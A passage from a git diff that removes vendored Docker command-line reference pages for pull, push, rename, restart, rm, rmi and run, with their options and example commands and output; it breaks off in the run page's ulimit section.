-Digest: sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 -Status: Downloaded newer image for ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 -``` - -Digest can also be used in the `FROM` of a Dockerfile, for example: - -```Dockerfile -FROM ubuntu@sha256:45b23dee08af5e43a7fea6c4cf9c25ccf269ee113168c19722f87876677c5cb2 -MAINTAINER some maintainer -``` - -> **Note**: Using this feature "pins" an image to a specific version in time. -> Docker will therefore not pull updated versions of an image, which may include -> security updates. If you want to pull an updated image, you need to change the -> digest accordingly. - - -## Pulling from a different registry - -By default, `docker pull` pulls images from [Docker Hub](https://hub.docker.com). It is also possible to -manually specify the path of a registry to pull from. For example, if you have -set up a local registry, you can specify its path to pull from it. A registry -path is similar to a URL, but does not contain a protocol specifier (`https://`). - -The following command pulls the `testing/test-image` image from a local registry -listening on port 5000 (`myregistry.local:5000`): - -```bash -$ docker pull myregistry.local:5000/testing/test-image -``` - -Registry credentials are managed by [docker login](login.md). - -Docker uses the `https://` protocol to communicate with a registry, unless the -registry is allowed to be accessed over an insecure connection. Refer to the -[insecure registries](dockerd.md#insecure-registries) section for more information. - - -## Pull a repository with multiple images - -By default, `docker pull` pulls a *single* image from the registry. A repository -can contain multiple images. To pull all images from a repository, provide the -`-a` (or `--all-tags`) option when using `docker pull`. - -This command pulls all images from the `fedora` repository: - -```bash -$ docker pull --all-tags fedora - -Pulling repository fedora -ad57ef8d78d7: Download complete -105182bb5e8b: Download complete -511136ea3c5a: Download complete -73bd853d2ea5: Download complete -.... - -Status: Downloaded newer image for fedora -``` - -After the pull has completed use the `docker images` command to see the -images that were pulled. The example below shows all the `fedora` images -that are present locally: - -```bash -$ docker images fedora - -REPOSITORY TAG IMAGE ID CREATED SIZE -fedora rawhide ad57ef8d78d7 5 days ago 359.3 MB -fedora 20 105182bb5e8b 5 days ago 372.7 MB -fedora heisenbug 105182bb5e8b 5 days ago 372.7 MB -fedora latest 105182bb5e8b 5 days ago 372.7 MB -``` - -## Canceling a pull - -Killing the `docker pull` process, for example by pressing `CTRL-c` while it is -running in a terminal, will terminate the pull operation. - -```bash -$ docker pull fedora - -Using default tag: latest -latest: Pulling from library/fedora -a3ed95caeb02: Pulling fs layer -236608c7b546: Pulling fs layer -^C -``` - -> **Note**: Technically, the Engine terminates a pull operation when the -> connection between the Docker Engine daemon and the Docker Engine client -> initiating the pull is lost. If the connection with the Engine daemon is -> lost for other reasons than a manual interaction, the pull is also aborted. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/push.md b/vendor/github.com/docker/docker/docs/reference/commandline/push.md deleted file mode 100644 index e36fd026d1..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/push.md +++ /dev/null @@ -1,75 +0,0 @@ ---- -title: "push" -description: "The push command description and usage" -keywords: "share, push, image" ---- - - - -# push - -```markdown -Usage: docker push [OPTIONS] NAME[:TAG] - -Push an image or a repository to a registry - -Options: - --disable-content-trust Skip image verification (default true) - --help Print usage -``` - -Use `docker push` to share your images to the [Docker Hub](https://hub.docker.com) -registry or to a self-hosted one. - -Refer to the [`docker tag`](tag.md) reference for more information about valid -image and tag names. - -Killing the `docker push` process, for example by pressing `CTRL-c` while it is -running in a terminal, terminates the push operation. - -Registry credentials are managed by [docker login](login.md). - -## Concurrent uploads - -By default the Docker daemon will push five layers of an image at a time. -If you are on a low bandwidth connection this may cause timeout issues and you may want to lower -this via the `--max-concurrent-uploads` daemon option. See the -[daemon documentation](dockerd.md) for more details. - -## Examples - -### Pushing a new image to a registry - -First save the new image by finding the container ID (using [`docker ps`](ps.md)) -and then committing it to a new image name. Note that only `a-z0-9-_.` are -allowed when naming images: - -```bash -$ docker commit c16378f943fe rhel-httpd -``` - -Now, push the image to the registry using the image ID. In this example the -registry is on host named `registry-host` and listening on port `5000`. To do -this, tag the image with the host name or IP address, and the port of the -registry: - -```bash -$ docker tag rhel-httpd registry-host:5000/myadmin/rhel-httpd -$ docker push registry-host:5000/myadmin/rhel-httpd -``` - -Check that this worked by running: - -```bash -$ docker images -``` - -You should see both `rhel-httpd` and `registry-host:5000/myadmin/rhel-httpd` -listed. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rename.md b/vendor/github.com/docker/docker/docs/reference/commandline/rename.md deleted file mode 100644 index be035f1ce4..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/rename.md +++ /dev/null @@ -1,27 +0,0 @@ ---- -title: "rename" -description: "The rename command description and usage" -keywords: "rename, docker, container" ---- - - - -# rename - -```markdown -Usage: docker rename CONTAINER NEW_NAME - -Rename a container - -Options: - --help Print usage -``` - -The `docker rename` command allows the container to be renamed to a different name. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/restart.md b/vendor/github.com/docker/docker/docs/reference/commandline/restart.md deleted file mode 100644 index 9f7ed00553..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/restart.md +++ /dev/null @@ -1,26 +0,0 @@ ---- -title: "restart" -description: "The restart command description and usage" -keywords: "restart, container, Docker" ---- - - - -# restart - -```markdown -Usage: docker restart [OPTIONS] CONTAINER [CONTAINER...] - -Restart one or more containers - -Options: - --help Print usage - -t, --time int Seconds to wait for stop before killing the container (default 10) -``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/rm.md deleted file mode 100644 index 1c3e795933..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/rm.md +++ /dev/null @@ -1,69 +0,0 @@ ---- -title: "rm" -description: "The rm command description and usage" -keywords: "remove, Docker, container" ---- - - - -# rm - -```markdown -Usage: docker rm [OPTIONS] CONTAINER [CONTAINER...] - -Remove one or more containers - -Options: - -f, --force Force the removal of a running container (uses SIGKILL) - --help Print usage - -l, --link Remove the specified link - -v, --volumes Remove the volumes associated with the container -``` - -## Examples - - $ docker rm /redis - /redis - -This will remove the container referenced under the link -`/redis`. - - $ docker rm --link /webapp/redis - /webapp/redis - -This will remove the underlying link between `/webapp` and the `/redis` -containers removing all network communication. - - $ docker rm --force redis - redis - -The main process inside the container referenced under the link `/redis` will receive -`SIGKILL`, then the container will be removed. - - $ docker rm $(docker ps -a -q) - -This command will delete all stopped containers. The command -`docker ps -a -q` will return all existing container IDs and pass them to -the `rm` command which will delete them. Any running containers will not be -deleted. - - $ docker rm -v redis - redis - -This command will remove the container and any volumes associated with it. -Note that if a volume was specified with a name, it will not be removed. - - $ docker create -v awesome:/foo -v /bar --name hello redis - hello - $ docker rm -v hello - -In this example, the volume for `/foo` will remain intact, but the volume for -`/bar` will be removed. The same behavior holds for volumes inherited with -`--volumes-from`. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md b/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md deleted file mode 100644 index 149b7635b6..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/rmi.md +++ /dev/null @@ -1,83 +0,0 @@ ---- -title: "rmi" -description: "The rmi command description and usage" -keywords: "remove, image, Docker" ---- - - - -# rmi - -```markdown -Usage: docker rmi [OPTIONS] IMAGE [IMAGE...] - -Remove one or more images - -Options: - -f, --force Force removal of the image - --help Print usage - --no-prune Do not delete untagged parents -``` - -You can remove an image using its short or long ID, its tag, or its digest. If -an image has one or more tag referencing it, you must remove all of them before -the image is removed. Digest references are removed automatically when an image -is removed by tag. - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - test1 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - test2 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - - $ docker rmi fd484f19954f - Error: Conflict, cannot delete image fd484f19954f because it is tagged in multiple repositories, use -f to force - 2013/12/11 05:47:16 Error: failed to remove one or more images - - $ docker rmi test1 - Untagged: test1:latest - $ docker rmi test2 - Untagged: test2:latest - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - $ docker rmi test - Untagged: test:latest - Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8 - -If you use the `-f` flag and specify the image's short or long ID, then this -command untags and removes all images that match the specified ID. - - $ docker images - REPOSITORY TAG IMAGE ID CREATED SIZE - test1 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - test latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - test2 latest fd484f19954f 23 seconds ago 7 B (virtual 4.964 MB) - - $ docker rmi -f fd484f19954f - Untagged: test1:latest - Untagged: test:latest - Untagged: test2:latest - Deleted: fd484f19954f4920da7ff372b5067f5b7ddb2fd3830cecd17b96ea9e286ba5b8 - -An image pulled by digest has no tag associated with it: - - $ docker images --digests - REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE - localhost:5000/test/busybox sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf 4986bf8c1536 9 weeks ago 2.43 MB - -To remove an image using its digest: - - $ docker rmi localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf - Untagged: localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf - Deleted: 4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125 - Deleted: ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2 - Deleted: df7546f9f060a2268024c8a230d8639878585defcc1bc6f79d2728a13957871b diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/run.md b/vendor/github.com/docker/docker/docs/reference/commandline/run.md deleted file mode 100644 index e57ba4bbea..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/run.md +++ /dev/null @@ -1,732 +0,0 @@ ---- -title: "run" -description: "The run command description and usage" -keywords: "run, command, container" ---- - - - -# run - -```markdown -Usage: docker run [OPTIONS] IMAGE [COMMAND] [ARG...] - -Run a command in a new container - -Options: - --add-host value Add a custom host-to-IP mapping (host:ip) (default []) - -a, --attach value Attach to STDIN, STDOUT or STDERR (default []) - --blkio-weight value Block IO (relative weight), between 10 and 1000 - --blkio-weight-device value Block IO weight (relative device weight) (default []) - --cap-add value Add Linux capabilities (default []) - --cap-drop value Drop Linux capabilities (default []) - --cgroup-parent string Optional parent cgroup for the container - --cidfile string Write the container ID to the file - --cpu-count int The number of CPUs available for execution by the container. - Windows daemon only. On Windows Server containers, this is - approximated as a percentage of total CPU usage. - --cpu-percent int Limit percentage of CPU available for execution - by the container. Windows daemon only. - The processor resource controls are mutually - exclusive, the order of precedence is CPUCount - first, then CPUShares, and CPUPercent last. - --cpu-period int Limit CPU CFS (Completely Fair Scheduler) period - --cpu-quota int Limit CPU CFS (Completely Fair Scheduler) quota - -c, --cpu-shares int CPU shares (relative weight) - --cpus NanoCPUs Number of CPUs (default 0.000) - --cpu-rt-period int Limit the CPU real-time period in microseconds - --cpu-rt-runtime int Limit the CPU real-time runtime in microseconds - --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) - --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) - -d, --detach Run container in background and print container ID - --detach-keys string Override the key sequence for detaching a container - --device value Add a host device to the container (default []) - --device-read-bps value Limit read rate (bytes per second) from a device (default []) - --device-read-iops value Limit read rate (IO per second) from a device (default []) - --device-write-bps value Limit write rate (bytes per second) to a device (default []) - --device-write-iops value Limit write rate (IO per second) to a device (default []) - --disable-content-trust Skip image verification (default true) - --dns value Set custom DNS servers (default []) - --dns-option value Set DNS options (default []) - --dns-search value Set custom DNS search domains (default []) - --entrypoint string Overwrite the default ENTRYPOINT of the image - -e, --env value Set environment variables (default []) - --env-file value Read in a file of environment variables (default []) - --expose value Expose a port or a range of ports (default []) - --group-add value Add additional groups to join (default []) - --health-cmd string Command to run to check health - --health-interval duration Time between running the check (ns|us|ms|s|m|h) (default 0s) - --health-retries int Consecutive failures needed to report unhealthy - --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) (default 0s) - --help Print usage - -h, --hostname string Container host name - --init Run an init inside the container that forwards signals and reaps processes - --init-path string Path to the docker-init binary - -i, --interactive Keep STDIN open even if not attached - --io-maxbandwidth string Maximum IO bandwidth limit for the system drive (Windows only) - (Windows only). The format is ``. - Unit is optional and can be `b` (bytes per second), - `k` (kilobytes per second), `m` (megabytes per second), - or `g` (gigabytes per second). If you omit the unit, - the system uses bytes per second. - --io-maxbandwidth and --io-maxiops are mutually exclusive options. - --io-maxiops uint Maximum IOps limit for the system drive (Windows only) - --ip string Container IPv4 address (e.g. 172.30.100.104) - --ip6 string Container IPv6 address (e.g. 2001:db8::33) - --ipc string IPC namespace to use - --isolation string Container isolation technology - --kernel-memory string Kernel memory limit - -l, --label value Set meta data on a container (default []) - --label-file value Read in a line delimited file of labels (default []) - --link value Add link to another container (default []) - --link-local-ip value Container IPv4/IPv6 link-local addresses (default []) - --log-driver string Logging driver for the container - --log-opt value Log driver options (default []) - --mac-address string Container MAC address (e.g. 92:d0:c6:0a:29:33) - -m, --memory string Memory limit - --memory-reservation string Memory soft limit - --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap - --memory-swappiness int Tune container memory swappiness (0 to 100) (default -1) - --name string Assign a name to the container - --network-alias value Add network-scoped alias for the container (default []) - --network string Connect a container to a network - 'bridge': create a network stack on the default Docker bridge - 'none': no networking - 'container:': reuse another container's network stack - 'host': use the Docker host network stack - '|': connect to a user-defined network - --no-healthcheck Disable any container-specified HEALTHCHECK - --oom-kill-disable Disable OOM Killer - --oom-score-adj int Tune host's OOM preferences (-1000 to 1000) - --pid string PID namespace to use - --pids-limit int Tune container pids limit (set -1 for unlimited) - --privileged Give extended privileges to this container - -p, --publish value Publish a container's port(s) to the host (default []) - -P, --publish-all Publish all exposed ports to random ports - --read-only Mount the container's root filesystem as read only - --restart string Restart policy to apply when a container exits (default "no") - Possible values are : no, on-failure[:max-retry], always, unless-stopped - --rm Automatically remove the container when it exits - --runtime string Runtime to use for this container - --security-opt value Security Options (default []) - --shm-size string Size of /dev/shm, default value is 64MB. - The format is ``. `number` must be greater than `0`. - Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), - or `g` (gigabytes). If you omit the unit, the system uses bytes. - --sig-proxy Proxy received signals to the process (default true) - --stop-signal string Signal to stop a container, SIGTERM by default (default "SIGTERM") - --stop-timeout=10 Timeout (in seconds) to stop a container - --storage-opt value Storage driver options for the container (default []) - --sysctl value Sysctl options (default map[]) - --tmpfs value Mount a tmpfs directory (default []) - -t, --tty Allocate a pseudo-TTY - --ulimit value Ulimit options (default []) - -u, --user string Username or UID (format: [:]) - --userns string User namespace to use - 'host': Use the Docker host user namespace - '': Use the Docker daemon user namespace specified by `--userns-remap` option. - --uts string UTS namespace to use - -v, --volume value Bind mount a volume (default []). The format - is `[host-src:]container-dest[:]`. - The comma-delimited `options` are [rw|ro], - [z|Z], [[r]shared|[r]slave|[r]private], and - [nocopy]. The 'host-src' is an absolute path - or a name value. - --volume-driver string Optional volume driver for the container - --volumes-from value Mount volumes from the specified container(s) (default []) - -w, --workdir string Working directory inside the container -``` - -The `docker run` command first `creates` a writeable container layer over the -specified image, and then `starts` it using the specified command. That is, -`docker run` is equivalent to the API `/containers/create` then -`/containers/(id)/start`. A stopped container can be restarted with all its -previous changes intact using `docker start`. See `docker ps -a` to view a list -of all containers. - -The `docker run` command can be used in combination with `docker commit` to -[*change the command that a container runs*](commit.md). There is additional detailed information about `docker run` in the [Docker run reference](../run.md). - -For information on connecting a container to a network, see the ["*Docker network overview*"](https://docs.docker.com/engine/userguide/networking/). - -## Examples - -### Assign name and allocate pseudo-TTY (--name, -it) - - $ docker run --name test -it debian - root@d6c0fe130dba:/# exit 13 - $ echo $? - 13 - $ docker ps -a | grep test - d6c0fe130dba debian:7 "/bin/bash" 26 seconds ago Exited (13) 17 seconds ago test - -This example runs a container named `test` using the `debian:latest` -image. The `-it` instructs Docker to allocate a pseudo-TTY connected to -the container's stdin; creating an interactive `bash` shell in the container. -In the example, the `bash` shell is quit by entering -`exit 13`. This exit code is passed on to the caller of -`docker run`, and is recorded in the `test` container's metadata. - -### Capture container ID (--cidfile) - - $ docker run --cidfile /tmp/docker_test.cid ubuntu echo "test" - -This will create a container and print `test` to the console. The `cidfile` -flag makes Docker attempt to create a new file and write the container ID to it. -If the file exists already, Docker will return an error. Docker will close this -file when `docker run` exits. - -### Full container capabilities (--privileged) - - $ docker run -t -i --rm ubuntu bash - root@bc338942ef20:/# mount -t tmpfs none /mnt - mount: permission denied - -This will *not* work, because by default, most potentially dangerous kernel -capabilities are dropped; including `cap_sys_admin` (which is required to mount -filesystems). However, the `--privileged` flag will allow it to run: - - $ docker run -t -i --privileged ubuntu bash - root@50e3f57e16e6:/# mount -t tmpfs none /mnt - root@50e3f57e16e6:/# df -h - Filesystem Size Used Avail Use% Mounted on - none 1.9G 0 1.9G 0% /mnt - -The `--privileged` flag gives *all* capabilities to the container, and it also -lifts all the limitations enforced by the `device` cgroup controller. In other -words, the container can then do almost everything that the host can do. This -flag exists to allow special use-cases, like running Docker within Docker. - -### Set working directory (-w) - - $ docker run -w /path/to/dir/ -i -t ubuntu pwd - -The `-w` lets the command being executed inside directory given, here -`/path/to/dir/`. If the path does not exist it is created inside the container. - -### Set storage driver options per container - - $ docker run -it --storage-opt size=120G fedora /bin/bash - -This (size) will allow to set the container rootfs size to 120G at creation time. -This option is only available for the `devicemapper`, `btrfs`, `overlay2`, -`windowsfilter` and `zfs` graph drivers. -For the `devicemapper`, `btrfs`, `windowsfilter` and `zfs` graph drivers, -user cannot pass a size less than the Default BaseFS Size. -For the `overlay2` storage driver, the size option is only available if the -backing fs is `xfs` and mounted with the `pquota` mount option. -Under these conditions, user can pass any size less then the backing fs size. - -### Mount tmpfs (--tmpfs) - - $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image - -The `--tmpfs` flag mounts an empty tmpfs into the container with the `rw`, -`noexec`, `nosuid`, `size=65536k` options. - -### Mount volume (-v, --read-only) - - $ docker run -v `pwd`:`pwd` -w `pwd` -i -t ubuntu pwd - -The `-v` flag mounts the current working directory into the container. The `-w` -lets the command being executed inside the current working directory, by -changing into the directory to the value returned by `pwd`. So this -combination executes the command using the container, but inside the -current working directory. - - $ docker run -v /doesnt/exist:/foo -w /foo -i -t ubuntu bash - -When the host directory of a bind-mounted volume doesn't exist, Docker -will automatically create this directory on the host for you. In the -example above, Docker will create the `/doesnt/exist` -folder before starting your container. - - $ docker run --read-only -v /icanwrite busybox touch /icanwrite/here - -Volumes can be used in combination with `--read-only` to control where -a container writes files. The `--read-only` flag mounts the container's root -filesystem as read only prohibiting writes to locations other than the -specified volumes for the container. - - $ docker run -t -i -v /var/run/docker.sock:/var/run/docker.sock -v /path/to/static-docker-binary:/usr/bin/docker busybox sh - -By bind-mounting the docker unix socket and statically linked docker -binary (refer to [get the linux binary]( -https://docs.docker.com/engine/installation/binaries/#/get-the-linux-binary)), -you give the container the full access to create and manipulate the host's -Docker daemon. - -On Windows, the paths must be specified using Windows-style semantics. - - PS C:\> docker run -v c:\foo:c:\dest microsoft/nanoserver cmd /s /c type c:\dest\somefile.txt - Contents of file - - PS C:\> docker run -v c:\foo:d: microsoft/nanoserver cmd /s /c type d:\somefile.txt - Contents of file - -The following examples will fail when using Windows-based containers, as the -destination of a volume or bind-mount inside the container must be one of: -a non-existing or empty directory; or a drive other than C:. Further, the source -of a bind mount must be a local directory, not a file. - - net use z: \\remotemachine\share - docker run -v z:\foo:c:\dest ... - docker run -v \\uncpath\to\directory:c:\dest ... - docker run -v c:\foo\somefile.txt:c:\dest ... - docker run -v c:\foo:c: ... - docker run -v c:\foo:c:\existing-directory-with-contents ... - -For in-depth information about volumes, refer to [manage data in containers](https://docs.docker.com/engine/tutorials/dockervolumes/) - -### Publish or expose port (-p, --expose) - - $ docker run -p 127.0.0.1:80:8080 ubuntu bash - -This binds port `8080` of the container to port `80` on `127.0.0.1` of the host -machine. The [Docker User -Guide](https://docs.docker.com/engine/userguide/networking/default_network/dockerlinks/) -explains in detail how to manipulate ports in Docker. - - $ docker run --expose 80 ubuntu bash - -This exposes port `80` of the container without publishing the port to the host -system's interfaces. - -### Set environment variables (-e, --env, --env-file) - - $ docker run -e MYVAR1 --env MYVAR2=foo --env-file ./env.list ubuntu bash - -This sets simple (non-array) environmental variables in the container. For -illustration all three -flags are shown here. Where `-e`, `--env` take an environment variable and -value, or if no `=` is provided, then that variable's current value, set via -`export`, is passed through (i.e. `$MYVAR1` from the host is set to `$MYVAR1` -in the container). When no `=` is provided and that variable is not defined -in the client's environment then that variable will be removed from the -container's list of environment variables. All three flags, `-e`, `--env` and -`--env-file` can be repeated. - -Regardless of the order of these three flags, the `--env-file` are processed -first, and then `-e`, `--env` flags. This way, the `-e` or `--env` will -override variables as needed. - - $ cat ./env.list - TEST_FOO=BAR - $ docker run --env TEST_FOO="This is a test" --env-file ./env.list busybox env | grep TEST_FOO - TEST_FOO=This is a test - -The `--env-file` flag takes a filename as an argument and expects each line -to be in the `VAR=VAL` format, mimicking the argument passed to `--env`. Comment -lines need only be prefixed with `#` - -An example of a file passed with `--env-file` - - $ cat ./env.list - TEST_FOO=BAR - - # this is a comment - TEST_APP_DEST_HOST=10.10.0.127 - TEST_APP_DEST_PORT=8888 - _TEST_BAR=FOO - TEST_APP_42=magic - helloWorld=true - 123qwe=bar - org.spring.config=something - - # pass through this variable from the caller - TEST_PASSTHROUGH - $ TEST_PASSTHROUGH=howdy docker run --env-file ./env.list busybox env - PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin - HOSTNAME=5198e0745561 - TEST_FOO=BAR - TEST_APP_DEST_HOST=10.10.0.127 - TEST_APP_DEST_PORT=8888 - _TEST_BAR=FOO - TEST_APP_42=magic - helloWorld=true - TEST_PASSTHROUGH=howdy - HOME=/root - 123qwe=bar - org.spring.config=something - - $ docker run --env-file ./env.list busybox env - PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin - HOSTNAME=5198e0745561 - TEST_FOO=BAR - TEST_APP_DEST_HOST=10.10.0.127 - TEST_APP_DEST_PORT=8888 - _TEST_BAR=FOO - TEST_APP_42=magic - helloWorld=true - TEST_PASSTHROUGH= - HOME=/root - 123qwe=bar - org.spring.config=something - -### Set metadata on container (-l, --label, --label-file) - -A label is a `key=value` pair that applies metadata to a container. To label a container with two labels: - - $ docker run -l my-label --label com.example.foo=bar ubuntu bash - -The `my-label` key doesn't specify a value so the label defaults to an empty -string(`""`). To add multiple labels, repeat the label flag (`-l` or `--label`). - -The `key=value` must be unique to avoid overwriting the label value. If you -specify labels with identical keys but different values, each subsequent value -overwrites the previous. Docker uses the last `key=value` you supply. - -Use the `--label-file` flag to load multiple labels from a file. Delimit each -label in the file with an EOL mark. The example below loads labels from a -labels file in the current directory: - - $ docker run --label-file ./labels ubuntu bash - -The label-file format is similar to the format for loading environment -variables. (Unlike environment variables, labels are not visible to processes -running inside a container.) The following example illustrates a label-file -format: - - com.example.label1="a label" - - # this is a comment - com.example.label2=another\ label - com.example.label3 - -You can load multiple label-files by supplying multiple `--label-file` flags. - -For additional information on working with labels, see [*Labels - custom -metadata in Docker*](https://docs.docker.com/engine/userguide/labels-custom-metadata/) in the Docker User -Guide. - -### Connect a container to a network (--network) - -When you start a container use the `--network` flag to connect it to a network. -This adds the `busybox` container to the `my-net` network. - -```bash -$ docker run -itd --network=my-net busybox -``` - -You can also choose the IP addresses for the container with `--ip` and `--ip6` -flags when you start the container on a user-defined network. - -```bash -$ docker run -itd --network=my-net --ip=10.10.9.75 busybox -``` - -If you want to add a running container to a network use the `docker network connect` subcommand. - -You can connect multiple containers to the same network. Once connected, the -containers can communicate easily need only another container's IP address -or name. For `overlay` networks or custom plugins that support multi-host -connectivity, containers connected to the same multi-host network but launched -from different Engines can also communicate in this way. - -**Note**: Service discovery is unavailable on the default bridge network. -Containers can communicate via their IP addresses by default. To communicate -by name, they must be linked. - -You can disconnect a container from a network using the `docker network -disconnect` command. - -### Mount volumes from container (--volumes-from) - - $ docker run --volumes-from 777f7dc92da7 --volumes-from ba8c0c54f0f2:ro -i -t ubuntu pwd - -The `--volumes-from` flag mounts all the defined volumes from the referenced -containers. Containers can be specified by repetitions of the `--volumes-from` -argument. The container ID may be optionally suffixed with `:ro` or `:rw` to -mount the volumes in read-only or read-write mode, respectively. By default, -the volumes are mounted in the same mode (read write or read only) as -the reference container. - -Labeling systems like SELinux require that proper labels are placed on volume -content mounted into a container. Without a label, the security system might -prevent the processes running inside the container from using the content. By -default, Docker does not change the labels set by the OS. - -To change the label in the container context, you can add either of two suffixes -`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file -objects on the shared volumes. The `z` option tells Docker that two containers -share the volume content. As a result, Docker labels the content with a shared -content label. Shared volume labels allow all containers to read/write content. -The `Z` option tells Docker to label the content with a private unshared label. -Only the current container can use a private volume. - -### Attach to STDIN/STDOUT/STDERR (-a) - -The `-a` flag tells `docker run` to bind to the container's `STDIN`, `STDOUT` -or `STDERR`. This makes it possible to manipulate the output and input as -needed. - - $ echo "test" | docker run -i -a stdin ubuntu cat - - -This pipes data into a container and prints the container's ID by attaching -only to the container's `STDIN`. - - $ docker run -a stderr ubuntu echo test - -This isn't going to print anything unless there's an error because we've -only attached to the `STDERR` of the container. The container's logs -still store what's been written to `STDERR` and `STDOUT`. - - $ cat somefile | docker run -i -a stdin mybuilder dobuild - -This is how piping a file into a container could be done for a build. -The container's ID will be printed after the build is done and the build -logs could be retrieved using `docker logs`. This is -useful if you need to pipe a file or something else into a container and -retrieve the container's ID once the container has finished running. - -### Add host device to container (--device) - - $ docker run --device=/dev/sdc:/dev/xvdc --device=/dev/sdd --device=/dev/zero:/dev/nulo -i -t ubuntu ls -l /dev/{xvdc,sdd,nulo} - brw-rw---- 1 root disk 8, 2 Feb 9 16:05 /dev/xvdc - brw-rw---- 1 root disk 8, 3 Feb 9 16:05 /dev/sdd - crw-rw-rw- 1 root root 1, 5 Feb 9 16:05 /dev/nulo - -It is often necessary to directly expose devices to a container. The `--device` -option enables that. For example, a specific block storage device or loop -device or audio device can be added to an otherwise unprivileged container -(without the `--privileged` flag) and have the application directly access it. - -By default, the container will be able to `read`, `write` and `mknod` these devices. -This can be overridden using a third `:rwm` set of options to each `--device` -flag: - - - $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk /dev/xvdc - - Command (m for help): q - $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk /dev/xvdc - You will not be able to write the partition table. - - Command (m for help): q - - $ docker run --device=/dev/sda:/dev/xvdc:rw --rm -it ubuntu fdisk /dev/xvdc - - Command (m for help): q - - $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk /dev/xvdc - fdisk: unable to open /dev/xvdc: Operation not permitted - -> **Note:** -> `--device` cannot be safely used with ephemeral devices. Block devices -> that may be removed should not be added to untrusted containers with -> `--device`. - -### Restart policies (--restart) - -Use Docker's `--restart` to specify a container's *restart policy*. A restart -policy controls whether the Docker daemon restarts a container after exit. -Docker supports the following restart policies: - - - - - - - - - - - - - - - - - - - - - - - - - - -
PolicyResult
no - Do not automatically restart the container when it exits. This is the - default. -
- - on-failure[:max-retries] - - - Restart only if the container exits with a non-zero exit status. - Optionally, limit the number of restart retries the Docker - daemon attempts. -
always - Always restart the container regardless of the exit status. - When you specify always, the Docker daemon will try to restart - the container indefinitely. The container will also always start - on daemon startup, regardless of the current state of the container. -
unless-stopped - Always restart the container regardless of the exit status, but - do not start it on daemon startup if the container has been put - to a stopped state before. -
- - $ docker run --restart=always redis - -This will run the `redis` container with a restart policy of **always** -so that if the container exits, Docker will restart it. - -More detailed information on restart policies can be found in the -[Restart Policies (--restart)](../run.md#restart-policies-restart) -section of the Docker run reference page. - -### Add entries to container hosts file (--add-host) - -You can add other hosts into a container's `/etc/hosts` file by using one or -more `--add-host` flags. This example adds a static address for a host named -`docker`: - - $ docker run --add-host=docker:10.180.0.1 --rm -it debian - root@f38c87f2a42d:/# ping docker - PING docker (10.180.0.1): 48 data bytes - 56 bytes from 10.180.0.1: icmp_seq=0 ttl=254 time=7.600 ms - 56 bytes from 10.180.0.1: icmp_seq=1 ttl=254 time=30.705 ms - ^C--- docker ping statistics --- - 2 packets transmitted, 2 packets received, 0% packet loss - round-trip min/avg/max/stddev = 7.600/19.152/30.705/11.553 ms - -Sometimes you need to connect to the Docker host from within your -container. To enable this, pass the Docker host's IP address to -the container using the `--add-host` flag. To find the host's address, -use the `ip addr show` command. - -The flags you pass to `ip addr show` depend on whether you are -using IPv4 or IPv6 networking in your containers. Use the following -flags for IPv4 address retrieval for a network device named `eth0`: - - $ HOSTIP=`ip -4 addr show scope global dev eth0 | grep inet | awk '{print \$2}' | cut -d / -f 1` - $ docker run --add-host=docker:${HOSTIP} --rm -it debian - -For IPv6 use the `-6` flag instead of the `-4` flag. For other network -devices, replace `eth0` with the correct device name (for example `docker0` -for the bridge device). - -### Set ulimits in container (--ulimit) - -Since setting `ulimit` settings in a container requires extra privileges not -available in the default container, you can set these using the `--ulimit` flag. -`--ulimit` is specified with a soft and hard limit as such: -`=[:]`, for example: - - $ docker run --ulimit nofile=1024:1024 --rm debian sh -c "ulimit -n" - 1024 - -> **Note:** -> If you do not provide a `hard limit`, the `soft limit` will be used -> for both values. If no `ulimits` are set, they will be inherited from 